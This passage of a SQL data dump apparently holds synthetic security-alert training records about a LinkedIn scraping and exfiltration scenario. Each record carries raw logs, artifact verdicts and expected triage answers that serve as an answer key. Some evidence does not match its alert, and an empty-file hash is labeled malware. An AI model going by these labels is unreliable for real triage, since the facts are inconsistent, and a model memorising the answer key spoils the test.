2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015-0005\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.150\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"sensitive_data.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":10485760,\\\"external_attacker_ip\\\":\\\"203.0.113.150\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.718Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015-0005\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.150\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"sensitive_data.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":10485760,\\\"external_attacker_ip\\\":\\\"203.0.113.150\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.718Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015-0005\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.150\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"sensitive_data.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":10485760,\\\"external_attacker_ip\\\":\\\"203.0.113.150\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1019, 'Unauthorized API Access Detected', 'medium', 'LinkedIn API logs', 'Data Brokers initiated their operation by exploiting LinkedIn\'s API, making unauthorized requests to scrape profile data. The operation was detected due to unusual patterns of API calls originating from external IPs associated with known malicious activities.', 'API Abuse', 'T1190 - Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:35:47Z\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"api_key\":\"12345-abcde-67890-fghij\",\"username\":\"data_broker_01\",\"requested_endpoint\":\"/v2/profile/scrape\",\"request_method\":\"GET\",\"response_status\":403,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-17 03:50:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous scraping activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host communicating with external attacker.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"data_broker_01\",\"is_critical\":true,\"osint_result\":{\"source\":\"LinkedIn API Logs\",\"verdict\":\"suspicious\",\"details\":\"Username used in unauthorized API access attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"clean\",\"details\":\"Hash not associated with known 
malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.720Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:47Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"api_key\\\":\\\"12345-abcde-67890-fghij\\\",\\\"username\\\":\\\"data_broker_01\\\",\\\"requested_endpoint\\\":\\\"/v2/profile/scrape\\\",\\\"request_method\\\":\\\"GET\\\",\\\"response_status\\\":403,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.720Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:47Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"api_key\\\":\\\"12345-abcde-67890-fghij\\\",\\\"username\\\":\\\"data_broker_01\\\",\\\"requested_endpoint\\\":\\\"/v2/profile/scrape\\\",\\\"request_method\\\":\\\"GET\\\",\\\"response_status\\\":403,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 
Safari/537.36\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.720Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:47Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"api_key\\\":\\\"12345-abcde-67890-fghij\\\",\\\"username\\\":\\\"data_broker_01\\\",\\\"requested_endpoint\\\":\\\"/v2/profile/scrape\\\",\\\"request_method\\\":\\\"GET\\\",\\\"response_status\\\":403,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.720Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:47Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"api_key\\\":\\\"12345-abcde-67890-fghij\\\",\\\"username\\\":\\\"data_broker_01\\\",\\\"requested_endpoint\\\":\\\"/v2/profile/scrape\\\",\\\"request_method\\\":\\\"GET\\\",\\\"response_status\\\":403,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.720Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:47Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"api_key\\\":\\\"12345-abcde-67890-fghij\\\",\\\"username\\\":\\\"data_broker_01\\\",\\\"requested_endpoint\\\":\\\"/v2/profile/scrape\\\",\\\"request_method\\\":\\\"GET\\\",\\\"response_status\\\":403,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1020, 'Unusual Data Extraction Patterns', 'high', 'Network traffic analysis', 'Abnormal data extraction patterns detected, indicating potential scraping of LinkedIn profiles.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"185.199.108.153\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\",\"request_uri\":\"https://www.linkedin.com/profile/view?id=123456789\",\"request_method\":\"GET\",\"response_status\":\"200\",\"bytes_transferred\":10485760,\"username\":\"j.doe\",\"malicious_pattern_detected\":true}', '2026-01-17 03:50:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal employee workstation.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"suspicious\",\"details\":\"Known to host suspicious activity related to data scraping.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://www.linkedin.com/profile/view?id=123456789\",\"is_critical\":false,\"osint_result\":{\"source\":\"LinkedIn\",\"verdict\":\"clean\",\"details\":\"Legitimate LinkedIn profile URL.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"John Doe, employee in sales department.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1021, 'Persistence Through API Key Rotation', 'medium', 'Access management logs', 'An unauthorized API key rotation was detected from a known malicious IP address, indicating an attempt to maintain persistent access.', 'Persistence Technique', 'T1098 - Account Manipulation', 1, 'new', NULL, '{\"event_time\":\"2023-10-10T14:32:07Z\",\"user\":\"malicious_actor\",\"source_ip\":\"203.0.113.45\",\"action\":\"api_key_rotation\",\"old_api_key\":\"abc123xyz456def789ghi012jkl345mn\",\"new_api_key\":\"def789ghi012jkl345mnabc123xyz456\",\"api_call\":\"/v1/key/rotate\",\"status\":\"success\",\"internal_ip\":\"192.168.1.25\"}', '2026-01-17 03:50:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"malicious_actor\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"malicious\",\"details\":\"User associated with unauthorized actions\"}},{\"id\":\"artifact_3\",\"type\":\"internal_ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised host\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-10T14:32:07Z\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"api_key_rotation\\\",\\\"old_api_key\\\":\\\"abc123xyz456def789ghi012jkl345mn\\\",\\\"new_api_key\\\":\\\"def789ghi012jkl345mnabc123xyz456\\\",\\\"api_call\\\":\\\"/v1/key/rotate\\\",\\\"status\\\":\\\"success\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-10T14:32:07Z\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"api_key_rotation\\\",\\\"old_api_key\\\":\\\"abc123xyz456def789ghi012jkl345mn\\\",\\\"new_api_key\\\":\\\"def789ghi012jkl345mnabc123xyz456\\\",\\\"api_call\\\":\\\"/v1/key/rotate\\\",\\\"status\\\":\\\"success\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-10T14:32:07Z\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"api_key_rotation\\\",\\\"old_api_key\\\":\\\"abc123xyz456def789ghi012jkl345mn\\\",\\\"new_api_key\\\":\\\"def789ghi012jkl345mnabc123xyz456\\\",\\\"api_call\\\":\\\"/v1/key/rotate\\\",\\\"status\\\":\\\"success\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-10T14:32:07Z\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"api_key_rotation\\\",\\\"old_api_key\\\":\\\"abc123xyz456def789ghi012jkl345mn\\\",\\\"new_api_key\\\":\\\"def789ghi012jkl345mnabc123xyz456\\\",\\\"api_call\\\":\\\"/v1/key/rotate\\\",\\\"status\\\":\\\"success\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-10T14:32:07Z\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"api_key_rotation\\\",\\\"old_api_key\\\":\\\"abc123xyz456def789ghi012jkl345mn\\\",\\\"new_api_key\\\":\\\"def789ghi012jkl345mnabc123xyz456\\\",\\\"api_call\\\":\\\"/v1/key/rotate\\\",\\\"status\\\":\\\"success\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1022, 'Lateral Movement to Additional Data Sources', 'high', 'Cross-platform access logs', 'The threat actor has moved laterally to access additional public databases, attempting to expand their data collection efforts. The observed activity involves accessing internal resources using compromised credentials and pivoting to external databases.', 'Lateral Movement', 'T1563.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.103\",\"internal_user\":\"jdoe\",\"accessed_resource\":\"PublicDatabaseServer\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"data_collector.exe\",\"action\":\"AccessGranted\",\"log_id\":\"ab12cd34ef56gh78ij90klmnopqr\"}', '2026-01-17 03:50:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.103\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Corporate asset in database subnet.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"HR Records\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Hash recognized as part of a data collection tool used by APTs.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"data_collector.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal File Catalog\",\"verdict\":\"suspicious\",\"details\":\"Executable not usually 
found on corporate systems.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.724Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.103\\\",\\\"internal_user\\\":\\\"jdoe\\\",\\\"accessed_resource\\\":\\\"PublicDatabaseServer\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"data_collector.exe\\\",\\\"action\\\":\\\"AccessGranted\\\",\\\"log_id\\\":\\\"ab12cd34ef56gh78ij90klmnopqr\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.724Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.103\\\",\\\"internal_user\\\":\\\"jdoe\\\",\\\"accessed_resource\\\":\\\"PublicDatabaseServer\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"data_collector.exe\\\",\\\"action\\\":\\\"AccessGranted\\\",\\\"log_id\\\":\\\"ab12cd34ef56gh78ij90klmnopqr\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.724Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.103\\\",\\\"internal_user\\\":\\\"jdoe\\\",\\\"accessed_resource\\\":\\\"PublicDatabaseServer\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"data_collector.exe\\\",\\\"action\\\":\\\"AccessGranted\\\",\\\"log_id\\\":\\\"ab12cd34ef56gh78ij90klmnopqr\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.724Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.103\\\",\\\"internal_user\\\":\\\"jdoe\\\",\\\"accessed_resource\\\":\\\"PublicDatabaseServer\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"data_collector.exe\\\",\\\"action\\\":\\\"AccessGranted\\\",\\\"log_id\\\":\\\"ab12cd34ef56gh78ij90klmnopqr\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.724Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.103\\\",\\\"internal_user\\\":\\\"jdoe\\\",\\\"accessed_resource\\\":\\\"PublicDatabaseServer\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"data_collector.exe\\\",\\\"action\\\":\\\"AccessGranted\\\",\\\"log_id\\\":\\\"ab12cd34ef56gh78ij90klmnopqr\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1023, 'Aggregated Data Exploitation Risk', 'high', 'Open-source intelligence reports', 'In the final phase of the operation, aggregated data is assessed for potential misuse in targeted campaigns. This data, collected from various sources, poses a significant risk if leveraged for malicious purposes.', 'Data Aggregation Risk', 'T1020: Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.100\",\"filename\":\"report_aggregated_data.csv\",\"user\":\"jdoe\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"data_aggregation\",\"status\":\"completed\"}', '2026-01-17 03:50:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known data exfiltration campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP used for data aggregation.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"report_aggregated_data.csv\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Files\",\"verdict\":\"clean\",\"details\":\"File used to store aggregated data.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potentially manipulated data files.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Company Directory\",\"verdict\":\"clean\",\"details\":\"Valid user involved in data aggregation 
process.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.725Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"filename\\\":\\\"report_aggregated_data.csv\\\",\\\"user\\\":\\\"jdoe\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"data_aggregation\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.725Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"filename\\\":\\\"report_aggregated_data.csv\\\",\\\"user\\\":\\\"jdoe\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"data_aggregation\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.725Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"filename\\\":\\\"report_aggregated_data.csv\\\",\\\"user\\\":\\\"jdoe\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"data_aggregation\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.725Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"filename\\\":\\\"report_aggregated_data.csv\\\",\\\"user\\\":\\\"jdoe\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"data_aggregation\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.725Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 